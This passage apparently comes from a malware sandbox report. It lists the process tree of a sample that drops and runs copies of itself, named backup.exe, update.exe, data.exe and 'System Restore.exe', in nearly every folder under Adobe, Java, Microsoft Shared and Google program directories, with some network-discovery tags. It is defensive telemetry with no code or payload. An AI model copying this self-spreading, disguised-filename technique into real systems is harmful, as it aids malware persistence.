        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\
        10⤵
        
        PID:7500
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\
        9⤵
        
        PID:1896
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\
        9⤵
        
        PID:7756
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\
        9⤵
        
        PID:6188
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\
        10⤵
        
        PID:3116
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\
        11⤵
        
        PID:8104
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\
        12⤵
        
        PID:5424
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\
        13⤵
        
        PID:6792
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\
        14⤵
        
        PID:5548
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\cef\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\cef\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\cef\
        15⤵
        
        PID:1536
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\libs\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\libs\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\libs\
        15⤵
        
        PID:8060
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\
        13⤵
        
        PID:708
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\
        14⤵
        
        PID:7360
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\cef\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\cef\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\cef\
        15⤵
        
        PID:8108
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\libs\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\libs\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\libs\
        15⤵
        
        PID:6216
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\
        13⤵
        
        PID:4120
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\
        14⤵
        
        PID:5860
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\cef\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\cef\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\cef\
        15⤵
        
        PID:5996
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\libs\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\libs\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\libs\
        15⤵
        
        PID:13144
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\
        12⤵
        
        PID:9876
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\update.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\update.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\
        13⤵
        
        PID:12612
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\System Restore.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\System Restore.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\
        14⤵
        
        PID:13292
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\
        14⤵
        
        PID:10584
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\
        15⤵
        
        PID:17144
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\
        8⤵
        
        PID:6824
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\
        9⤵
        
        PID:3404
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\
        10⤵
        
        PID:6720
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\
        9⤵
        
        PID:7276
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\
        9⤵
        
        PID:2156
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\System Restore.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\System Restore.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\
        10⤵
        
        PID:7476
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\
        11⤵
        
        PID:7972
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5000
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8012
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1520
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4900
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\
        8⤵
        
        PID:7576
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\update.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\update.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\
        9⤵
        
        PID:5248
      - C:\Program Files (x86)\Common Files\System Restore.exe
        
        "C:\Program Files (x86)\Common Files\System Restore.exe" C:\Program Files (x86)\Common Files\
        6⤵
        
        PID:1868
        
        C:\Program Files (x86)\Common Files\Adobe\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\backup.exe" C:\Program Files (x86)\Common Files\Adobe\
        7⤵
        
        PID:5600
        
        C:\Program Files (x86)\Common Files\Adobe\Acrobat\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Acrobat\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Acrobat\
        8⤵
        
        PID:4292
        
        C:\Program Files (x86)\Common Files\Adobe\ARM\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\ARM\backup.exe" C:\Program Files (x86)\Common Files\Adobe\ARM\
        8⤵
        
        PID:1688
        
        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\backup.exe" C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\
        9⤵
        
        PID:3400
        
        C:\Program Files (x86)\Common Files\Adobe\HelpCfg\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\HelpCfg\backup.exe" C:\Program Files (x86)\Common Files\Adobe\HelpCfg\
        8⤵
        
        PID:5168
        
        C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US\backup.exe" C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US\
        9⤵
        
        PID:744
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\
        8⤵
        
        PID:7456
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\
        9⤵
        
        PID:7916
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\System Restore.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\System Restore.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\
        10⤵
        
        PID:6104
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\
        11⤵
        
        PID:7744
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\
        11⤵
        
        PID:7544
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Adobe\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Adobe\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Adobe\
        12⤵
        
        PID:5316
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\data.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\data.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\
        12⤵
        
        PID:7340
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\
        13⤵
        
        PID:5512
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\
        14⤵
        
        PID:3304
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_CA\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_CA\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_CA\
        15⤵
        
        PID:1644
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\
        15⤵
        
        PID:7588
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_US\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_US\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_US\
        15⤵
        
        PID:5604
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\
        14⤵
        
        PID:3068
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\
        15⤵
        
        PID:8020
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\
        15⤵
        
        PID:6716
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\
        15⤵
        
        PID:6896
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\
        14⤵
        
        PID:5600
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\data.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\data.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\
        15⤵
        
        PID:6256
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_GB\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_GB\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_GB\
        15⤵
        
        PID:4548
        
        C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\backup.exe
        
        "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\backup.exe" C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\
        15⤵
        
        PID:6820
        
        C:\Program Files (x86)\Common Files\Java\backup.exe
        
        "C:\Program Files (x86)\Common Files\Java\backup.exe" C:\Program Files (x86)\Common Files\Java\
        7⤵
        
        PID:2508
        
        C:\Program Files (x86)\Common Files\Java\Java Update\backup.exe
        
        "C:\Program Files (x86)\Common Files\Java\Java Update\backup.exe" C:\Program Files (x86)\Common Files\Java\Java Update\
        8⤵
        
        PID:1524
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\
        7⤵
        
        PID:8080
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\
        8⤵
        
        PID:3952
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\
        8⤵
        
        PID:5328
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\ink\update.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\update.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\ink\
        8⤵
        
        PID:7296
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\
        9⤵
        
        PID:6080
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\
        9⤵
        
        PID:5124
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\ink\es-ES\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\es-ES\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\ink\es-ES\
        9⤵
        
        PID:4020
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\
        9⤵
        
        PID:6948
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\ink\HWRCustomization\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\HWRCustomization\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\ink\HWRCustomization\
        9⤵
        
        PID:5584
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\
        9⤵
        
        PID:7340
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\ink\ja-JP\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\ja-JP\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\ink\ja-JP\
        9⤵
        
        PID:13156
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\ink\uk-UA\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\uk-UA\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\ink\uk-UA\
        9⤵
        
        PID:17760
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\
        8⤵
        
        PID:4912
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\PublicAssemblies\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\PublicAssemblies\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\PublicAssemblies\
        9⤵
        
        PID:17156
        
        C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\backup.exe
        
        "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\backup.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\
        8⤵
        
        PID:9028
        
        C:\Program Files (x86)\Common Files\Oracle\backup.exe
        
        "C:\Program Files (x86)\Common Files\Oracle\backup.exe" C:\Program Files (x86)\Common Files\Oracle\
        7⤵
        
        PID:8808
        
        C:\Program Files (x86)\Common Files\Oracle\Java\update.exe
        
        "C:\Program Files (x86)\Common Files\Oracle\Java\update.exe" C:\Program Files (x86)\Common Files\Oracle\Java\
        8⤵
        
        PID:10468
        
        C:\Program Files (x86)\Common Files\Oracle\Java\javapath\backup.exe
        
        "C:\Program Files (x86)\Common Files\Oracle\Java\javapath\backup.exe" C:\Program Files (x86)\Common Files\Oracle\Java\javapath\
        9⤵
        
        PID:10544
        
        C:\Program Files (x86)\Common Files\Services\backup.exe
        
        "C:\Program Files (x86)\Common Files\Services\backup.exe" C:\Program Files (x86)\Common Files\Services\
        7⤵
        
        PID:17708
      - C:\Program Files (x86)\Google\backup.exe
        
        "C:\Program Files (x86)\Google\backup.exe" C:\Program Files (x86)\Google\
        6⤵
        
        PID:7592
        
        C:\Program Files (x86)\Google\Temp\backup.exe
        
        "C:\Program Files (x86)\Google\Temp\backup.exe" C:\Program Files (x86)\Google\Temp\
        7⤵
        
        PID:5296
        
        C:\Program Files (x86)\Google\Update\backup.exe
        
        "C:\Program Files (x86)\Google\Update\backup.exe" C:\Program Files (x86)\Google\Update\
        7⤵
        
        PID:532
        
        C:\Program Files (x86)\Google\Update\1.3.36.371\backup.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.371\backup.exe" C:\Program Files (x86)\Google\Update\1.3.36.371\
        8⤵
        
        PID:6584
        
        C:\Program Files (x86)\Google\Update\Download\backup.exe
        
        "C:\Program Files (x86)\Google\Update\Download\backup.exe" C:\Program Files (x86)\Google\Update\Download\
        8⤵
        
        PID:5532
        
        C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\backup.exe
        
        "C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\backup.exe" C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\
        9⤵
        
        PID:4760
        
        C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\123.0.6312.123\backup.exe
        
